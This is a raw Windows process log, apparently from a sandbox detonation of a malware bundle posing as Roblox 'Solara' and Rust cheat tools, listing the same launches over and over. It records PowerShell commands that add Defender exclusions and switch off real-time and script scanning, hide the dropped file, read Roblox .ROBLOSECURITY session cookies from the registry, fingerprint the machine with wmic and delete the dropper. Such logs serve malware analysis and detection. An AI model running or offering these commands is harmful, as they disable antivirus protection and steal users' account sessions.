C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Roaming\svhost.exe
C:\Users\Admin\AppData\Roaming\svhost.exe
C:\Users\Admin\AppData\Roaming\svhost.exe.exe
"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"
C:\hostNet\RuntimeBroker.exe
"C:\hostNet\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
